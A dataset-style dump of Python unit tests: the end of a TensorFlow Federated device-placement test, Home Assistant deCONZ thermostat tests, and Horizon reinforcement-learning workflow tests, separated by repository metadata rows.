packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
function_type = computation_types.FunctionType(None, tf.int32)
proto = pb.Computation(
type=type_serialization.serialize_type(function_type),
tensorflow=pb.TensorFlow(
graph_def=packed_graph_def, parameter=None, result=result_binding))
building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
device_placements = building_block_analysis.get_device_placement_in(
building_block)
all_device_placements = list(device_placements.keys())
self.assertLen(all_device_placements, 1)
self.assertEqual(all_device_placements[0], '')
self.assertGreater(device_placements[''], 0)
def test_gets_all_explicit_placement(self):
with tf.Graph().as_default() as g:
with tf.device('/cpu:0'):
a = tf.constant(0)
b = tf.constant(1)
c = a + b
_, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
function_type = computation_types.FunctionType(None, tf.int32)
proto = pb.Computation(
type=type_serialization.serialize_type(function_type),
tensorflow=pb.TensorFlow(
graph_def=packed_graph_def, parameter=None, result=result_binding))
building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
device_placements = building_block_analysis.get_device_placement_in(
building_block)
all_device_placements = list(device_placements.keys())
self.assertLen(all_device_placements, 1)
self.assertIn('CPU', all_device_placements[0])
self.assertGreater(device_placements[all_device_placements[0]], 0)
def test_gets_some_explicit_some_none_placement(self):
with tf.Graph().as_default() as g:
with tf.device('/cpu:0'):
a = tf.constant(0)
b = tf.constant(1)
c = a + b
_, result_binding = tensorflow_utils.capture_result_from_graph(c, g)
packed_graph_def = serialization_utils.pack_graph_def(g.as_graph_def())
function_type = computation_types.FunctionType(None, tf.int32)
proto = pb.Computation(
type=type_serialization.serialize_type(function_type),
tensorflow=pb.TensorFlow(
graph_def=packed_graph_def, parameter=None, result=result_binding))
building_block = building_blocks.ComputationBuildingBlock.from_proto(proto)
device_placements = building_block_analysis.get_device_placement_in(
building_block)
all_device_placements = list(device_placements.keys())
self.assertLen(all_device_placements, 2)
if all_device_placements[0]:
self.assertIn('CPU', all_device_placements[0])
self.assertEqual('', all_device_placements[1])
else:
self.assertIn('CPU', all_device_placements[1])
self.assertEqual('', all_device_placements[0])
self.assertGreater(device_placements[all_device_placements[0]], 0)
self.assertGreater(device_placements[all_device_placements[1]], 0)
if __name__ == '__main__':
absltest.main()
| 38.428 | 82 | 0.747788 | 1,268 | 9,607 | 5.328864 | 0.138801 | 0.041439 | 0.04499 | 0.034631 | 0.810123 | 0.78008 | 0.766908 | 0.721622 | 0.706527 | 0.689063 | 0 | 0.010063 | 0.162173 | 9,607 | 249 | 83 | 38.582329 | 0.82942 | 0.05954 | 0 | 0.690217 | 0 | 0 | 0.010531 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.092391 | false | 0 | 0.054348 | 0.005435 | 0.184783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a37debade3c6ca8c228379d3718e1e7f03c5810 | 23,121 | py | Python | tests/components/deconz/test_climate.py | AdmiralStipe/core | e9334347eb8354795cdb17f1401a80ef3abfb269 | [
"Apache-2.0"
] | 4 | 2016-06-22T12:00:41.000Z | 2018-06-11T20:31:25.000Z | tests/components/deconz/test_climate.py | AdmiralStipe/core | e9334347eb8354795cdb17f1401a80ef3abfb269 | [
"Apache-2.0"
] | 57 | 2020-10-15T06:47:00.000Z | 2022-03-31T06:11:18.000Z | tests/components/deconz/test_climate.py | AdmiralStipe/core | e9334347eb8354795cdb17f1401a80ef3abfb269 | [
"Apache-2.0"
] | 6 | 2019-07-06T00:43:13.000Z | 2021-01-16T13:27:06.000Z | """deCONZ climate platform tests."""
from copy import deepcopy
import pytest
from homeassistant.components.climate import (
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
SERVICE_SET_HVAC_MODE,
SERVICE_SET_PRESET_MODE,
SERVICE_SET_TEMPERATURE,
)
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
ATTR_HVAC_MODE,
ATTR_PRESET_MODE,
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
FAN_AUTO,
FAN_HIGH,
FAN_LOW,
FAN_MEDIUM,
FAN_OFF,
FAN_ON,
HVAC_MODE_AUTO,
HVAC_MODE_COOL,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
PRESET_COMFORT,
)
from homeassistant.components.deconz.climate import (
DECONZ_FAN_SMART,
DECONZ_PRESET_MANUAL,
)
from homeassistant.components.deconz.const import CONF_ALLOW_CLIP_SENSOR
from homeassistant.components.deconz.gateway import get_gateway_from_config_entry
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_TEMPERATURE,
STATE_OFF,
STATE_UNAVAILABLE,
)
from .test_gateway import (
DECONZ_WEB_REQUEST,
mock_deconz_put_request,
setup_deconz_integration,
)
SENSORS = {
"1": {
"id": "Thermostat id",
"name": "Thermostat",
"type": "ZHAThermostat",
"state": {"on": True, "temperature": 2260, "valve": 30},
"config": {
"battery": 100,
"heatsetpoint": 2200,
"mode": "auto",
"offset": 10,
"reachable": True,
},
"uniqueid": "00:00:00:00:00:00:00:00-00",
},
"2": {
"id": "CLIP thermostat id",
"name": "CLIP thermostat",
"type": "CLIPThermostat",
"state": {"on": True, "temperature": 2260, "valve": 30},
"config": {"reachable": True},
"uniqueid": "00:00:00:00:00:00:00:02-00",
},
}
async def test_no_sensors(hass, aioclient_mock):
"""Test that no sensors in deconz results in no climate entities."""
await setup_deconz_integration(hass, aioclient_mock)
assert len(hass.states.async_all()) == 0
async def test_simple_climate_device(hass, aioclient_mock):
"""Test successful creation of climate entities.
This is a simple water heater that only supports setting temperature and on and off.
"""
data = deepcopy(DECONZ_WEB_REQUEST)
data["sensors"] = {
"0": {
"config": {
"battery": 59,
"displayflipped": None,
"heatsetpoint": 2100,
"locked": None,
"mountingmode": None,
"offset": 0,
"on": True,
"reachable": True,
},
"ep": 1,
"etag": "6130553ac247174809bae47144ee23f8",
"lastseen": "2020-11-29T19:31Z",
"manufacturername": "Danfoss",
"modelid": "eTRV0100",
"name": "thermostat",
"state": {
"errorcode": None,
"lastupdated": "2020-11-29T19:28:40.665",
"mountingmodeactive": False,
"on": True,
"temperature": 2102,
"valve": 24,
"windowopen": "Closed",
},
"swversion": "01.02.0008 01.02",
"type": "ZHAThermostat",
"uniqueid": "14:b4:57:ff:fe:d5:4e:77-01-0201",
}
}
config_entry = await setup_deconz_integration(
hass, aioclient_mock, get_state_response=data
)
gateway = get_gateway_from_config_entry(hass, config_entry)
assert len(hass.states.async_all()) == 2
climate_thermostat = hass.states.get("climate.thermostat")
assert climate_thermostat.state == HVAC_MODE_HEAT
assert climate_thermostat.attributes["hvac_modes"] == [
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
]
assert climate_thermostat.attributes["current_temperature"] == 21.0
assert climate_thermostat.attributes["temperature"] == 21.0
assert hass.states.get("sensor.thermostat_battery_level").state == "59"
# Event signals thermostat configured off
state_changed_event = {
"t": "event",
"e": "changed",
"r": "sensors",
"id": "0",
"state": {"on": False},
}
gateway.api.event_handler(state_changed_event)
await hass.async_block_till_done()
assert hass.states.get("climate.thermostat").state == STATE_OFF
# Event signals thermostat state on
state_changed_event = {
"t": "event",
"e": "changed",
"r": "sensors",
"id": "0",
"state": {"on": True},
}
gateway.api.event_handler(state_changed_event)
await hass.async_block_till_done()
assert hass.states.get("climate.thermostat").state == HVAC_MODE_HEAT
# Verify service calls
mock_deconz_put_request(aioclient_mock, config_entry.data, "/sensors/0/config")
# Service turn on thermostat
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_HEAT},
blocking=True,
)
assert aioclient_mock.mock_calls[1][2] == {"on": True}
# Service turn on thermostat
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_OFF},
blocking=True,
)
assert aioclient_mock.mock_calls[2][2] == {"on": False}
# Service set HVAC mode to unsupported value
with pytest.raises(ValueError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_AUTO},
blocking=True,
)
async def test_climate_device_without_cooling_support(hass, aioclient_mock):
"""Test successful creation of sensor entities."""
data = deepcopy(DECONZ_WEB_REQUEST)
data["sensors"] = deepcopy(SENSORS)
config_entry = await setup_deconz_integration(
hass, aioclient_mock, get_state_response=data
)
gateway = get_gateway_from_config_entry(hass, config_entry)
assert len(hass.states.async_all()) == 2
climate_thermostat = hass.states.get("climate.thermostat")
assert climate_thermostat.state == HVAC_MODE_AUTO
assert climate_thermostat.attributes["hvac_modes"] == [
HVAC_MODE_AUTO,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
]
assert climate_thermostat.attributes["current_temperature"] == 22.6
assert climate_thermostat.attributes["temperature"] == 22.0
assert hass.states.get("sensor.thermostat") is None
assert hass.states.get("sensor.thermostat_battery_level").state == "100"
assert hass.states.get("climate.presence_sensor") is None
assert hass.states.get("climate.clip_thermostat") is None
# Event signals thermostat configured off
state_changed_event = {
"t": "event",
"e": "changed",
"r": "sensors",
"id": "1",
"config": {"mode": "off"},
}
gateway.api.event_handler(state_changed_event)
await hass.async_block_till_done()
assert hass.states.get("climate.thermostat").state == STATE_OFF
# Event signals thermostat state on
state_changed_event = {
"t": "event",
"e": "changed",
"r": "sensors",
"id": "1",
"config": {"mode": "other"},
"state": {"on": True},
}
gateway.api.event_handler(state_changed_event)
await hass.async_block_till_done()
assert hass.states.get("climate.thermostat").state == HVAC_MODE_HEAT
# Event signals thermostat state off
state_changed_event = {
"t": "event",
"e": "changed",
"r": "sensors",
"id": "1",
"state": {"on": False},
}
gateway.api.event_handler(state_changed_event)
await hass.async_block_till_done()
assert hass.states.get("climate.thermostat").state == STATE_OFF
# Verify service calls
mock_deconz_put_request(aioclient_mock, config_entry.data, "/sensors/1/config")
# Service set HVAC mode to auto
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_AUTO},
blocking=True,
)
assert aioclient_mock.mock_calls[1][2] == {"mode": "auto"}
# Service set HVAC mode to heat
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_HEAT},
blocking=True,
)
assert aioclient_mock.mock_calls[2][2] == {"mode": "heat"}
# Service set HVAC mode to off
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_OFF},
blocking=True,
)
assert aioclient_mock.mock_calls[3][2] == {"mode": "off"}
# Service set HVAC mode to unsupported value
with pytest.raises(ValueError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: "climate.thermostat", ATTR_HVAC_MODE: HVAC_MODE_COOL},
blocking=True,
)
# Service set temperature to 20
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: "climate.thermostat", ATTR_TEMPERATURE: 20},
blocking=True,
)
assert aioclient_mock.mock_calls[4][2] == {"heatsetpoint": 2000.0}
# Service set temperature without providing temperature attribute
with pytest.raises(ValueError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{
ATTR_ENTITY_ID: "climate.thermostat",
ATTR_TARGET_TEMP_HIGH: 30,
ATTR_TARGET_TEMP_LOW: 10,
},
blocking=True,
)
await hass.config_entries.async_unload(config_entry.entry_id)
states = hass.states.async_all()
assert len(hass.states.async_all()) == 2
for state in states:
assert state.state == STATE_UNAVAILABLE
await hass.config_entries.async_remove(config_entry.entry_id)
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 0
async def test_climate_device_with_cooling_support(hass, aioclient_mock):
"""Test successful creation of sensor entities."""
data = deepcopy(DECONZ_WEB_REQUEST)
data["sensors"] = {
"0": {
"config": {
"battery": 25,
"coolsetpoint": None,
"fanmode": None,
"heatsetpoint": 2222,
"mode": "heat",
"offset": 0,
"on": True,
"reachable": True,
},
"ep": 1,
"etag": "074549903686a77a12ef0f06c499b1ef",
"lastseen": "2020-11-27T13:45Z",
"manufacturername": "Zen Within",
"modelid": "Zen-01",
"name": "Zen-01",
"state": {
"lastupdated": "2020-11-27T13:42:40.863",
"on": False,
"temperature": 2320,
},
"type": "ZHAThermostat",
"uniqueid": "00:24:46:00:00:11:6f:56-01-0201",
}
}
config_entry = await setup_deconz_integration(
hass, aioclient_mock, get_state_response=data
)
gateway = get_gateway_from_config_entry(hass, config_entry)
assert len(hass.states.async_all()) == 2
climate_thermostat = hass.states.get("climate.zen_01")
assert climate_thermostat.state == HVAC_MODE_HEAT
assert climate_thermostat.attributes["hvac_modes"] == [
HVAC_MODE_AUTO,
HVAC_MODE_COOL,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
]
assert climate_thermostat.attributes["current_temperature"] == 23.2
assert climate_thermostat.attributes["temperature"] == 22.2
assert hass.states.get("sensor.zen_01_battery_level").state == "25"
# Event signals thermostat state cool
state_changed_event = {
"t": "event",
"e": "changed",
"r": "sensors",
"id": "0",
"config": {"mode": "cool"},
}
gateway.api.event_handler(state_changed_event)
await hass.async_block_till_done()
assert hass.states.get("climate.zen_01").state == HVAC_MODE_COOL
# Verify service calls
mock_deconz_put_request(aioclient_mock, config_entry.data, "/sensors/0/config")
# Service set temperature to 20
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: "climate.zen_01", ATTR_TEMPERATURE: 20},
blocking=True,
)
assert aioclient_mock.mock_calls[1][2] == {"coolsetpoint": 2000.0}
async def test_climate_device_with_fan_support(hass, aioclient_mock):
"""Test successful creation of sensor entities."""
data = deepcopy(DECONZ_WEB_REQUEST)
data["sensors"] = {
"0": {
"config": {
"battery": 25,
"coolsetpoint": None,
"fanmode": "auto",
"heatsetpoint": 2222,
"mode": "heat",
"offset": 0,
"on": True,
"reachable": True,
},
"ep": 1,
"etag": "074549903686a77a12ef0f06c499b1ef",
"lastseen": "2020-11-27T13:45Z",
"manufacturername": "Zen Within",
"modelid": "Zen-01",
"name": "Zen-01",
"state": {
"lastupdated": "2020-11-27T13:42:40.863",
"on": False,
"temperature": 2320,
},
"type": "ZHAThermostat",
"uniqueid": "00:24:46:00:00:11:6f:56-01-0201",
}
}
config_entry = await setup_deconz_integration(
hass, aioclient_mock, get_state_response=data
)
gateway = get_gateway_from_config_entry(hass, config_entry)
assert len(hass.states.async_all()) == 2
climate_thermostat = hass.states.get("climate.zen_01")
assert climate_thermostat.state == HVAC_MODE_HEAT
assert climate_thermostat.attributes["fan_mode"] == FAN_AUTO
assert climate_thermostat.attributes["fan_modes"] == [
DECONZ_FAN_SMART,
FAN_AUTO,
FAN_HIGH,
FAN_MEDIUM,
FAN_LOW,
FAN_ON,
FAN_OFF,
]
# Event signals fan mode defaults to off
state_changed_event = {
"t": "event",
"e": "changed",
"r": "sensors",
"id": "0",
"config": {"fanmode": "unsupported"},
}
gateway.api.event_handler(state_changed_event)
await hass.async_block_till_done()
assert hass.states.get("climate.zen_01").attributes["fan_mode"] == FAN_OFF
# Event signals unsupported fan mode
state_changed_event = {
"t": "event",
"e": "changed",
"r": "sensors",
"id": "0",
"config": {"fanmode": "unsupported"},
"state": {"on": True},
}
gateway.api.event_handler(state_changed_event)
await hass.async_block_till_done()
assert hass.states.get("climate.zen_01").attributes["fan_mode"] == FAN_ON
# Event signals unsupported fan mode
state_changed_event = {
"t": "event",
"e": "changed",
"r": "sensors",
"id": "0",
"config": {"fanmode": "unsupported"},
}
gateway.api.event_handler(state_changed_event)
await hass.async_block_till_done()
assert hass.states.get("climate.zen_01").attributes["fan_mode"] == FAN_ON
# Verify service calls
mock_deconz_put_request(aioclient_mock, config_entry.data, "/sensors/0/config")
# Service set fan mode to off
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: "climate.zen_01", ATTR_FAN_MODE: FAN_OFF},
blocking=True,
)
assert aioclient_mock.mock_calls[1][2] == {"fanmode": "off"}
# Service set fan mode to custom deCONZ mode smart
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: "climate.zen_01", ATTR_FAN_MODE: DECONZ_FAN_SMART},
blocking=True,
)
assert aioclient_mock.mock_calls[2][2] == {"fanmode": "smart"}
# Service set fan mode to unsupported value
with pytest.raises(ValueError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: "climate.zen_01", ATTR_FAN_MODE: "unsupported"},
blocking=True,
)
async def test_climate_device_with_preset(hass, aioclient_mock):
"""Test successful creation of sensor entities."""
data = deepcopy(DECONZ_WEB_REQUEST)
data["sensors"] = {
"0": {
"config": {
"battery": 25,
"coolsetpoint": None,
"fanmode": None,
"heatsetpoint": 2222,
"mode": "heat",
"preset": "auto",
"offset": 0,
"on": True,
"reachable": True,
},
"ep": 1,
"etag": "074549903686a77a12ef0f06c499b1ef",
"lastseen": "2020-11-27T13:45Z",
"manufacturername": "Zen Within",
"modelid": "Zen-01",
"name": "Zen-01",
"state": {
"lastupdated": "2020-11-27T13:42:40.863",
"on": False,
"temperature": 2320,
},
"type": "ZHAThermostat",
"uniqueid": "00:24:46:00:00:11:6f:56-01-0201",
}
}
config_entry = await setup_deconz_integration(
hass, aioclient_mock, get_state_response=data
)
gateway = get_gateway_from_config_entry(hass, config_entry)
assert len(hass.states.async_all()) == 2
climate_zen_01 = hass.states.get("climate.zen_01")
assert climate_zen_01.state == HVAC_MODE_HEAT
assert climate_zen_01.attributes["current_temperature"] == 23.2
assert climate_zen_01.attributes["temperature"] == 22.2
assert climate_zen_01.attributes["preset_mode"] == "auto"
assert climate_zen_01.attributes["preset_modes"] == [
"auto",
"boost",
"comfort",
"complex",
"eco",
"holiday",
"manual",
]
# Event signals deCONZ preset
state_changed_event = {
"t": "event",
"e": "changed",
"r": "sensors",
"id": "0",
"config": {"preset": "manual"},
}
gateway.api.event_handler(state_changed_event)
await hass.async_block_till_done()
assert (
hass.states.get("climate.zen_01").attributes["preset_mode"]
== DECONZ_PRESET_MANUAL
)
# Event signals unknown preset
state_changed_event = {
"t": "event",
"e": "changed",
"r": "sensors",
"id": "0",
"config": {"preset": "unsupported"},
}
gateway.api.event_handler(state_changed_event)
await hass.async_block_till_done()
assert hass.states.get("climate.zen_01").attributes["preset_mode"] is None
# Verify service calls
mock_deconz_put_request(aioclient_mock, config_entry.data, "/sensors/0/config")
# Service set preset to HASS preset
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: "climate.zen_01", ATTR_PRESET_MODE: PRESET_COMFORT},
blocking=True,
)
assert aioclient_mock.mock_calls[1][2] == {"preset": "comfort"}
# Service set preset to custom deCONZ preset
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: "climate.zen_01", ATTR_PRESET_MODE: DECONZ_PRESET_MANUAL},
blocking=True,
)
assert aioclient_mock.mock_calls[2][2] == {"preset": "manual"}
# Service set preset to unsupported value
with pytest.raises(ValueError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: "climate.zen_01", ATTR_PRESET_MODE: "unsupported"},
blocking=True,
)
async def test_clip_climate_device(hass, aioclient_mock):
"""Test successful creation of sensor entities."""
data = deepcopy(DECONZ_WEB_REQUEST)
data["sensors"] = deepcopy(SENSORS)
config_entry = await setup_deconz_integration(
hass,
aioclient_mock,
options={CONF_ALLOW_CLIP_SENSOR: True},
get_state_response=data,
)
assert len(hass.states.async_all()) == 3
assert hass.states.get("climate.thermostat").state == HVAC_MODE_AUTO
assert hass.states.get("sensor.thermostat") is None
assert hass.states.get("sensor.thermostat_battery_level").state == "100"
assert hass.states.get("climate.clip_thermostat").state == HVAC_MODE_HEAT
# Disallow clip sensors
hass.config_entries.async_update_entry(
config_entry, options={CONF_ALLOW_CLIP_SENSOR: False}
)
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 2
assert hass.states.get("climate.clip_thermostat") is None
# Allow clip sensors
hass.config_entries.async_update_entry(
config_entry, options={CONF_ALLOW_CLIP_SENSOR: True}
)
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 3
assert hass.states.get("climate.clip_thermostat").state == HVAC_MODE_HEAT
async def test_verify_state_update(hass, aioclient_mock):
"""Test that state update properly."""
data = deepcopy(DECONZ_WEB_REQUEST)
data["sensors"] = deepcopy(SENSORS)
config_entry = await setup_deconz_integration(
hass, aioclient_mock, get_state_response=data
)
gateway = get_gateway_from_config_entry(hass, config_entry)
assert hass.states.get("climate.thermostat").state == HVAC_MODE_AUTO
state_changed_event = {
"t": "event",
"e": "changed",
"r": "sensors",
"id": "1",
"state": {"on": False},
}
gateway.api.event_handler(state_changed_event)
await hass.async_block_till_done()
assert hass.states.get("climate.thermostat").state == HVAC_MODE_AUTO
assert gateway.api.sensors["1"].changed_keys == {"state", "r", "t", "on", "e", "id"}
async def test_add_new_climate_device(hass, aioclient_mock):
"""Test that adding a new climate device works."""
config_entry = await setup_deconz_integration(hass, aioclient_mock)
gateway = get_gateway_from_config_entry(hass, config_entry)
assert len(hass.states.async_all()) == 0
state_added_event = {
"t": "event",
"e": "added",
"r": "sensors",
"id": "1",
"sensor": deepcopy(SENSORS["1"]),
}
gateway.api.event_handler(state_added_event)
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 2
assert hass.states.get("climate.thermostat").state == HVAC_MODE_AUTO
assert hass.states.get("sensor.thermostat_battery_level").state == "100"
| 30.746011 | 88 | 0.614506 | 2,646 | 23,121 | 5.101285 | 0.08579 | 0.032597 | 0.030819 | 0.038006 | 0.823529 | 0.790191 | 0.766262 | 0.74411 | 0.734627 | 0.699141 | 0 | 0.034527 | 0.26344 | 23,121 | 751 | 89 | 30.786951 | 0.758074 | 0.049782 | 0 | 0.62906 | 0 | 0 | 0.164039 | 0.030965 | 0 | 0 | 0 | 0 | 0.124786 | 1 | 0 | false | 0 | 0.015385 | 0 | 0.015385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a445aa02c91fba85caedb7a6a2a3c83c7128f78 | 6,895 | py | Python | ml/rl/test/workflow/test_oss_workflows.py | roamiri/Horizon | 2654cd769f97e914203c1bab7964c420caa04976 | [
"BSD-3-Clause"
] | null | null | null | ml/rl/test/workflow/test_oss_workflows.py | roamiri/Horizon | 2654cd769f97e914203c1bab7964c420caa04976 | [
"BSD-3-Clause"
] | null | null | null | ml/rl/test/workflow/test_oss_workflows.py | roamiri/Horizon | 2654cd769f97e914203c1bab7964c420caa04976 | [
"BSD-3-Clause"
] | 1 | 2019-09-09T07:04:18.000Z | 2019-09-09T07:04:18.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import os
import tempfile
import unittest
import torch
from ml.rl.tensorboardX import SummaryWriterContext
from ml.rl.training.dqn_predictor import DQNPredictor
from ml.rl.workflow import ddpg_workflow, dqn_workflow, parametric_dqn_workflow
curr_dir = os.path.dirname(__file__)
class TestOSSWorkflows(unittest.TestCase):
def setUp(self):
SummaryWriterContext._reset_globals()
def tearDown(self):
SummaryWriterContext._reset_globals()
def _test_dqn_workflow(self, use_gpu=False, use_all_avail_gpus=False):
"""Run DQN workflow to ensure no crashes, algorithm correctness
not tested here."""
with tempfile.TemporaryDirectory() as tmpdirname:
params = {
"training_data_path": os.path.join(
curr_dir, "test_data/discrete_action/cartpole_training.json.bz2"
),
"eval_data_path": os.path.join(
curr_dir, "test_data/discrete_action/cartpole_eval.json.bz2"
),
"state_norm_data_path": os.path.join(
curr_dir, "test_data/discrete_action/cartpole_norm.json"
),
"model_output_path": tmpdirname,
"use_gpu": use_gpu,
"use_all_avail_gpus": use_all_avail_gpus,
"actions": ["0", "1"],
"epochs": 1,
"rl": {},
"rainbow": {},
"training": {"minibatch_size": 1024},
}
predictor = dqn_workflow.train_network(params)
test_float_state_features = [{"0": 1.0, "1": 1.0, "2": 1.0, "3": 1.0}]
q_values = predictor.predict(test_float_state_features)
assert len(q_values[0].keys()) == 2
def test_dqn_workflow(self):
self._test_dqn_workflow()
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_dqn_workflow_gpu(self):
self._test_dqn_workflow(use_gpu=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_dqn_workflow_all_gpus(self):
self._test_dqn_workflow(use_gpu=True, use_all_avail_gpus=True)
def _test_parametric_dqn_workflow(self, use_gpu=False, use_all_avail_gpus=False):
"""Run Parametric DQN workflow to ensure no crashes, algorithm correctness
not tested here."""
with tempfile.TemporaryDirectory() as tmpdirname:
params = {
"training_data_path": os.path.join(
curr_dir, "test_data/parametric_action/cartpole_training.json.bz2"
),
"eval_data_path": os.path.join(
curr_dir, "test_data/parametric_action/cartpole_eval.json.bz2"
),
"state_norm_data_path": os.path.join(
curr_dir, "test_data/parametric_action/state_features_norm.json"
),
"action_norm_data_path": os.path.join(
curr_dir, "test_data/parametric_action/action_norm.json"
),
"model_output_path": tmpdirname,
"use_gpu": use_gpu,
"use_all_avail_gpus": use_all_avail_gpus,
"epochs": 1,
"rl": {},
"rainbow": {},
"training": {"minibatch_size": 1024},
}
predictor = parametric_dqn_workflow.train_network(params)
test_float_state_features = [{"0": 1.0, "1": 1.0, "2": 1.0, "3": 1.0}]
test_int_state_features = [{}]
test_action_features = [{"4": 0.0, "5": 1.0}]
q_values = predictor.predict(
test_float_state_features, test_int_state_features, test_action_features
)
assert len(q_values[0].keys()) == 1
def test_parametric_dqn_workflow(self):
self._test_parametric_dqn_workflow()
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_parametric_dqn_workflow_gpu(self):
self._test_parametric_dqn_workflow(use_gpu=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_parametric_dqn_workflow_all_gpus(self):
self._test_parametric_dqn_workflow(use_gpu=True, use_all_avail_gpus=True)
def _test_ddpg_workflow(self, use_gpu=False, use_all_avail_gpus=False):
"""Run DDPG workflow to ensure no crashes, algorithm correctness
not tested here."""
with tempfile.TemporaryDirectory() as tmpdirname:
params = {
"training_data_path": os.path.join(
curr_dir, "test_data/continuous_action/pendulum_training.json.bz2"
),
"eval_data_path": os.path.join(
curr_dir, "test_data/continuous_action/pendulum_eval.json.bz2"
),
"state_norm_data_path": os.path.join(
curr_dir, "test_data/continuous_action/state_features_norm.json"
),
"action_norm_data_path": os.path.join(
curr_dir, "test_data/continuous_action/action_norm.json"
),
"model_output_path": tmpdirname,
"use_gpu": use_gpu,
"use_all_avail_gpus": use_all_avail_gpus,
"epochs": 1,
"rl": {},
"rainbow": {},
"shared_training": {"minibatch_size": 1024},
"actor_training": {},
"critic_training": {},
}
predictor = ddpg_workflow.train_network(params)
test_float_state_features = [{"0": 1.0, "1": 1.0, "2": 1.0, "3": 1.0}]
test_int_state_features = [{}]
action = predictor.actor_prediction(
test_float_state_features, test_int_state_features
)
assert len(action) == 1
def test_ddpg_workflow(self):
self._test_ddpg_workflow()
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_ddpg_workflow_gpu(self):
self._test_ddpg_workflow(use_gpu=True)
@unittest.skipIf(not torch.cuda.is_available(), "CUDA not available")
def test_ddpg_workflow_all_gpus(self):
self._test_ddpg_workflow(use_gpu=True, use_all_avail_gpus=True)
def test_read_c2_model_from_file(self):
"""Test reading output caffe2 model from file and using it for inference."""
path = os.path.join(curr_dir, "test_data/discrete_action/example_predictor.c2")
predictor = DQNPredictor.load(path, "minidb", int_features=False)
test_float_state_features = [{"0": 1.0, "1": 1.0, "2": 1.0, "3": 1.0}]
q_values = predictor.predict(test_float_state_features)
assert len(q_values[0].keys()) == 2
